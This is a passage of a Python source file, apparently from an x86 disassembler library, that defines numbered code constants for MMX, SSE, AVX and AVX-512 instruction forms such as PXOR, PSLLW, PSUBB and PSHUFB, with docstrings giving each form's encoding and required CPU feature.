EVEX_VPADDSW_ZMM_K1Z_ZMM_ZMMM512: int = 2444
"""
``VPADDSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG ED /r``
``AVX512BW``
``16/32/64-bit``
"""
PMAXSW_MM_MMM64: int = 2445
"""
``PMAXSW mm1, mm2/m64``
``NP 0F EE /r``
``SSE``
``16/32/64-bit``
"""
PMAXSW_XMM_XMMM128: int = 2446
"""
``PMAXSW xmm1, xmm2/m128``
``66 0F EE /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMAXSW_XMM_XMM_XMMM128: int = 2447
"""
``VPMAXSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG EE /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMAXSW_YMM_YMM_YMMM256: int = 2448
"""
``VPMAXSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG EE /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMAXSW_XMM_K1Z_XMM_XMMM128: int = 2449
"""
``VPMAXSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG EE /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXSW_YMM_K1Z_YMM_YMMM256: int = 2450
"""
``VPMAXSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG EE /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXSW_ZMM_K1Z_ZMM_ZMMM512: int = 2451
"""
``VPMAXSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG EE /r``
``AVX512BW``
``16/32/64-bit``
"""
PXOR_MM_MMM64: int = 2452
"""
``PXOR mm, mm/m64``
``NP 0F EF /r``
``MMX``
``16/32/64-bit``
"""
PXOR_XMM_XMMM128: int = 2453
"""
``PXOR xmm1, xmm2/m128``
``66 0F EF /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPXOR_XMM_XMM_XMMM128: int = 2454
"""
``VPXOR xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG EF /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPXOR_YMM_YMM_YMMM256: int = 2455
"""
``VPXOR ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG EF /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPXORD_XMM_K1Z_XMM_XMMM128B32: int = 2456
"""
``VPXORD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 EF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPXORD_YMM_K1Z_YMM_YMMM256B32: int = 2457
"""
``VPXORD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 EF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPXORD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2458
"""
``VPXORD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 EF /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPXORQ_XMM_K1Z_XMM_XMMM128B64: int = 2459
"""
``VPXORQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 EF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPXORQ_YMM_K1Z_YMM_YMMM256B64: int = 2460
"""
``VPXORQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 EF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPXORQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2461
"""
``VPXORQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 EF /r``
``AVX512F``
``16/32/64-bit``
"""
LDDQU_XMM_M128: int = 2462
"""
``LDDQU xmm1, m128``
``F2 0F F0 /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VLDDQU_XMM_M128: int = 2463
"""
``VLDDQU xmm1, m128``
``VEX.128.F2.0F.WIG F0 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VLDDQU_YMM_M256: int = 2464
"""
``VLDDQU ymm1, m256``
``VEX.256.F2.0F.WIG F0 /r``
``AVX``
``16/32/64-bit``
"""
PSLLW_MM_MMM64: int = 2465
"""
``PSLLW mm, mm/m64``
``NP 0F F1 /r``
``MMX``
``16/32/64-bit``
"""
PSLLW_XMM_XMMM128: int = 2466
"""
``PSLLW xmm1, xmm2/m128``
``66 0F F1 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLW_XMM_XMM_XMMM128: int = 2467
"""
``VPSLLW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F1 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLW_YMM_YMM_XMMM128: int = 2468
"""
``VPSLLW ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG F1 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLW_XMM_K1Z_XMM_XMMM128: int = 2469
"""
``VPSLLW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG F1 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLW_YMM_K1Z_YMM_XMMM128: int = 2470
"""
``VPSLLW ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.WIG F1 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLW_ZMM_K1Z_ZMM_XMMM128: int = 2471
"""
``VPSLLW zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.WIG F1 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSLLD_MM_MMM64: int = 2472
"""
``PSLLD mm, mm/m64``
``NP 0F F2 /r``
``MMX``
``16/32/64-bit``
"""
PSLLD_XMM_XMMM128: int = 2473
"""
``PSLLD xmm1, xmm2/m128``
``66 0F F2 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLD_XMM_XMM_XMMM128: int = 2474
"""
``VPSLLD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F2 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLD_YMM_YMM_XMMM128: int = 2475
"""
``VPSLLD ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG F2 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLD_XMM_K1Z_XMM_XMMM128: int = 2476
"""
``VPSLLD xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.W0 F2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLD_YMM_K1Z_YMM_XMMM128: int = 2477
"""
``VPSLLD ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.W0 F2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLD_ZMM_K1Z_ZMM_XMMM128: int = 2478
"""
``VPSLLD zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.W0 F2 /r``
``AVX512F``
``16/32/64-bit``
"""
PSLLQ_MM_MMM64: int = 2479
"""
``PSLLQ mm, mm/m64``
``NP 0F F3 /r``
``MMX``
``16/32/64-bit``
"""
PSLLQ_XMM_XMMM128: int = 2480
"""
``PSLLQ xmm1, xmm2/m128``
``66 0F F3 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLQ_XMM_XMM_XMMM128: int = 2481
"""
``VPSLLQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F3 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLQ_YMM_YMM_XMMM128: int = 2482
"""
``VPSLLQ ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG F3 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLQ_XMM_K1Z_XMM_XMMM128: int = 2483
"""
``VPSLLQ xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.W1 F3 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLQ_YMM_K1Z_YMM_XMMM128: int = 2484
"""
``VPSLLQ ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.W1 F3 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLQ_ZMM_K1Z_ZMM_XMMM128: int = 2485
"""
``VPSLLQ zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.W1 F3 /r``
``AVX512F``
``16/32/64-bit``
"""
PMULUDQ_MM_MMM64: int = 2486
"""
``PMULUDQ mm1, mm2/m64``
``NP 0F F4 /r``
``SSE2``
``16/32/64-bit``
"""
PMULUDQ_XMM_XMMM128: int = 2487
"""
``PMULUDQ xmm1, xmm2/m128``
``66 0F F4 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMULUDQ_XMM_XMM_XMMM128: int = 2488
"""
``VPMULUDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F4 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULUDQ_YMM_YMM_YMMM256: int = 2489
"""
``VPMULUDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG F4 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULUDQ_XMM_K1Z_XMM_XMMM128B64: int = 2490
"""
``VPMULUDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 F4 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULUDQ_YMM_K1Z_YMM_YMMM256B64: int = 2491
"""
``VPMULUDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 F4 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULUDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2492
"""
``VPMULUDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 F4 /r``
``AVX512F``
``16/32/64-bit``
"""
PMADDWD_MM_MMM64: int = 2493
"""
``PMADDWD mm, mm/m64``
``NP 0F F5 /r``
``MMX``
``16/32/64-bit``
"""
PMADDWD_XMM_XMMM128: int = 2494
"""
``PMADDWD xmm1, xmm2/m128``
``66 0F F5 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMADDWD_XMM_XMM_XMMM128: int = 2495
"""
``VPMADDWD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F5 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMADDWD_YMM_YMM_YMMM256: int = 2496
"""
``VPMADDWD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG F5 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMADDWD_XMM_K1Z_XMM_XMMM128: int = 2497
"""
``VPMADDWD xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG F5 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMADDWD_YMM_K1Z_YMM_YMMM256: int = 2498
"""
``VPMADDWD ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG F5 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMADDWD_ZMM_K1Z_ZMM_ZMMM512: int = 2499
"""
``VPMADDWD zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG F5 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSADBW_MM_MMM64: int = 2500
"""
``PSADBW mm1, mm2/m64``
``NP 0F F6 /r``
``SSE``
``16/32/64-bit``
"""
PSADBW_XMM_XMMM128: int = 2501
"""
``PSADBW xmm1, xmm2/m128``
``66 0F F6 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSADBW_XMM_XMM_XMMM128: int = 2502
"""
``VPSADBW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F6 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSADBW_YMM_YMM_YMMM256: int = 2503
"""
``VPSADBW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG F6 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSADBW_XMM_XMM_XMMM128: int = 2504
"""
``VPSADBW xmm1, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG F6 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSADBW_YMM_YMM_YMMM256: int = 2505
"""
``VPSADBW ymm1, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG F6 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSADBW_ZMM_ZMM_ZMMM512: int = 2506
"""
``VPSADBW zmm1, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG F6 /r``
``AVX512BW``
``16/32/64-bit``
"""
MASKMOVQ_RDI_MM_MM: int = 2507
"""
``MASKMOVQ mm1, mm2``
``NP 0F F7 /r``
``SSE``
``16/32/64-bit``
"""
MASKMOVDQU_RDI_XMM_XMM: int = 2508
"""
``MASKMOVDQU xmm1, xmm2``
``66 0F F7 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMASKMOVDQU_RDI_XMM_XMM: int = 2509
"""
``VMASKMOVDQU xmm1, xmm2``
``VEX.128.66.0F.WIG F7 /r``
``AVX``
``16/32/64-bit``
"""
PSUBB_MM_MMM64: int = 2510
"""
``PSUBB mm, mm/m64``
``NP 0F F8 /r``
``MMX``
``16/32/64-bit``
"""
PSUBB_XMM_XMMM128: int = 2511
"""
``PSUBB xmm1, xmm2/m128``
``66 0F F8 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBB_XMM_XMM_XMMM128: int = 2512
"""
``VPSUBB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F8 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBB_YMM_YMM_YMMM256: int = 2513
"""
``VPSUBB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG F8 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBB_XMM_K1Z_XMM_XMMM128: int = 2514
"""
``VPSUBB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG F8 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBB_YMM_K1Z_YMM_YMMM256: int = 2515
"""
``VPSUBB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG F8 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBB_ZMM_K1Z_ZMM_ZMMM512: int = 2516
"""
``VPSUBB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG F8 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSUBW_MM_MMM64: int = 2517
"""
``PSUBW mm, mm/m64``
``NP 0F F9 /r``
``MMX``
``16/32/64-bit``
"""
PSUBW_XMM_XMMM128: int = 2518
"""
``PSUBW xmm1, xmm2/m128``
``66 0F F9 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBW_XMM_XMM_XMMM128: int = 2519
"""
``VPSUBW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F9 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBW_YMM_YMM_YMMM256: int = 2520
"""
``VPSUBW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG F9 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBW_XMM_K1Z_XMM_XMMM128: int = 2521
"""
``VPSUBW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG F9 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBW_YMM_K1Z_YMM_YMMM256: int = 2522
"""
``VPSUBW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG F9 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBW_ZMM_K1Z_ZMM_ZMMM512: int = 2523
"""
``VPSUBW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG F9 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSUBD_MM_MMM64: int = 2524
"""
``PSUBD mm, mm/m64``
``NP 0F FA /r``
``MMX``
``16/32/64-bit``
"""
PSUBD_XMM_XMMM128: int = 2525
"""
``PSUBD xmm1, xmm2/m128``
``66 0F FA /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBD_XMM_XMM_XMMM128: int = 2526
"""
``VPSUBD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG FA /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBD_YMM_YMM_YMMM256: int = 2527
"""
``VPSUBD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG FA /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBD_XMM_K1Z_XMM_XMMM128B32: int = 2528
"""
``VPSUBD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 FA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSUBD_YMM_K1Z_YMM_YMMM256B32: int = 2529
"""
``VPSUBD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 FA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSUBD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2530
"""
``VPSUBD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 FA /r``
``AVX512F``
``16/32/64-bit``
"""
PSUBQ_MM_MMM64: int = 2531
"""
``PSUBQ mm1, mm2/m64``
``NP 0F FB /r``
``SSE2``
``16/32/64-bit``
"""
PSUBQ_XMM_XMMM128: int = 2532
"""
``PSUBQ xmm1, xmm2/m128``
``66 0F FB /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBQ_XMM_XMM_XMMM128: int = 2533
"""
``VPSUBQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG FB /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBQ_YMM_YMM_YMMM256: int = 2534
"""
``VPSUBQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG FB /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBQ_XMM_K1Z_XMM_XMMM128B64: int = 2535
"""
``VPSUBQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 FB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSUBQ_YMM_K1Z_YMM_YMMM256B64: int = 2536
"""
``VPSUBQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 FB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSUBQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2537
"""
``VPSUBQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 FB /r``
``AVX512F``
``16/32/64-bit``
"""
PADDB_MM_MMM64: int = 2538
"""
``PADDB mm, mm/m64``
``NP 0F FC /r``
``MMX``
``16/32/64-bit``
"""
PADDB_XMM_XMMM128: int = 2539
"""
``PADDB xmm1, xmm2/m128``
``66 0F FC /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDB_XMM_XMM_XMMM128: int = 2540
"""
``VPADDB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG FC /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDB_YMM_YMM_YMMM256: int = 2541
"""
``VPADDB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG FC /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDB_XMM_K1Z_XMM_XMMM128: int = 2542
"""
``VPADDB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG FC /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDB_YMM_K1Z_YMM_YMMM256: int = 2543
"""
``VPADDB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG FC /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDB_ZMM_K1Z_ZMM_ZMMM512: int = 2544
"""
``VPADDB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG FC /r``
``AVX512BW``
``16/32/64-bit``
"""
PADDW_MM_MMM64: int = 2545
"""
``PADDW mm, mm/m64``
``NP 0F FD /r``
``MMX``
``16/32/64-bit``
"""
PADDW_XMM_XMMM128: int = 2546
"""
``PADDW xmm1, xmm2/m128``
``66 0F FD /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDW_XMM_XMM_XMMM128: int = 2547
"""
``VPADDW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG FD /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDW_YMM_YMM_YMMM256: int = 2548
"""
``VPADDW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG FD /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDW_XMM_K1Z_XMM_XMMM128: int = 2549
"""
``VPADDW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG FD /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDW_YMM_K1Z_YMM_YMMM256: int = 2550
"""
``VPADDW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG FD /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDW_ZMM_K1Z_ZMM_ZMMM512: int = 2551
"""
``VPADDW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG FD /r``
``AVX512BW``
``16/32/64-bit``
"""
PADDD_MM_MMM64: int = 2552
"""
``PADDD mm, mm/m64``
``NP 0F FE /r``
``MMX``
``16/32/64-bit``
"""
PADDD_XMM_XMMM128: int = 2553
"""
``PADDD xmm1, xmm2/m128``
``66 0F FE /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDD_XMM_XMM_XMMM128: int = 2554
"""
``VPADDD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG FE /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDD_YMM_YMM_YMMM256: int = 2555
"""
``VPADDD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG FE /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDD_XMM_K1Z_XMM_XMMM128B32: int = 2556
"""
``VPADDD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 FE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPADDD_YMM_K1Z_YMM_YMMM256B32: int = 2557
"""
``VPADDD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 FE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPADDD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2558
"""
``VPADDD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 FE /r``
``AVX512F``
``16/32/64-bit``
"""
UD0_R16_RM16: int = 2559
"""
``UD0 r16, r/m16``
``o16 0F FF /r``
``286+``
``16/32/64-bit``
"""
UD0_R32_RM32: int = 2560
"""
``UD0 r32, r/m32``
``o32 0F FF /r``
``386+``
``16/32/64-bit``
"""
UD0_R64_RM64: int = 2561
"""
``UD0 r64, r/m64``
``o64 0F FF /r``
``X64``
``64-bit``
"""
PSHUFB_MM_MMM64: int = 2562
"""
``PSHUFB mm1, mm2/m64``
``NP 0F 38 00 /r``
``SSSE3``
``16/32/64-bit``
"""
PSHUFB_XMM_XMMM128: int = 2563
"""
``PSHUFB xmm1, xmm2/m128``
``66 0F 38 00 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPSHUFB_XMM_XMM_XMMM128: int = 2564
"""
``VPSHUFB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 00 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSHUFB_YMM_YMM_YMMM256: int = 2565
"""
``VPSHUFB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 00 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSHUFB_XMM_K1Z_XMM_XMMM128: int = 2566
"""
``VPSHUFB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 00 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSHUFB_YMM_K1Z_YMM_YMMM256: int = 2567
"""
``VPSHUFB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 00 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSHUFB_ZMM_K1Z_ZMM_ZMMM512: int = 2568
"""
``VPSHUFB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 00 /r``
``AVX512BW``
``16/32/64-bit``
"""
PHADDW_MM_MMM64: int = 2569
"""
``PHADDW mm1, mm2/m64``
``NP 0F 38 01 /r``
``SSSE3``
``16/32/64-bit``
"""
PHADDW_XMM_XMMM128: int = 2570
"""
``PHADDW xmm1, xmm2/m128``
``66 0F 38 01 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPHADDW_XMM_XMM_XMMM128: int = 2571
"""
``VPHADDW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 01 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPHADDW_YMM_YMM_YMMM256: int = 2572
"""
``VPHADDW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 01 /r``
``AVX2``
``16/32/64-bit``
"""
PHADDD_MM_MMM64: int = 2573
"""
``PHADDD mm1, mm2/m64``
``NP 0F 38 02 /r``
``SSSE3``
``16/32/64-bit``
"""
PHADDD_XMM_XMMM128: int = 2574
"""
``PHADDD xmm1, xmm2/m128``
``66 0F 38 02 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPHADDD_XMM_XMM_XMMM128: int = 2575
"""
``VPHADDD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 02 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPHADDD_YMM_YMM_YMMM256: int = 2576
"""
``VPHADDD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 02 /r``
``AVX2``
``16/32/64-bit``
"""
PHADDSW_MM_MMM64: int = 2577
"""
``PHADDSW mm1, mm2/m64``
``NP 0F 38 03 /r``
``SSSE3``
``16/32/64-bit``
"""
PHADDSW_XMM_XMMM128: int = 2578
"""
``PHADDSW xmm1, xmm2/m128``
``66 0F 38 03 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPHADDSW_XMM_XMM_XMMM128: int = 2579
"""
``VPHADDSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 03 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPHADDSW_YMM_YMM_YMMM256: int = 2580
"""
``VPHADDSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 03 /r``
``AVX2``
``16/32/64-bit``
"""
PMADDUBSW_MM_MMM64: int = 2581
"""
``PMADDUBSW mm1, mm2/m64``
``NP 0F 38 04 /r``
``SSSE3``
``16/32/64-bit``
"""
PMADDUBSW_XMM_XMMM128: int = 2582
"""
``PMADDUBSW xmm1, xmm2/m128``
``66 0F 38 04 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPMADDUBSW_XMM_XMM_XMMM128: int = 2583
"""
``VPMADDUBSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 04 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMADDUBSW_YMM_YMM_YMMM256: int = 2584
"""
``VPMADDUBSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 04 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMADDUBSW_XMM_K1Z_XMM_XMMM128: int = 2585
"""
``VPMADDUBSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 04 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMADDUBSW_YMM_K1Z_YMM_YMMM256: int = 2586
"""
``VPMADDUBSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 04 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMADDUBSW_ZMM_K1Z_ZMM_ZMMM512: int = 2587
"""
``VPMADDUBSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 04 /r``
``AVX512BW``
``16/32/64-bit``
"""
PHSUBW_MM_MMM64: int = 2588
"""
``PHSUBW mm1, mm2/m64``
``NP 0F 38 05 /r``
``SSSE3``
``16/32/64-bit``
"""
PHSUBW_XMM_XMMM128: int = 2589
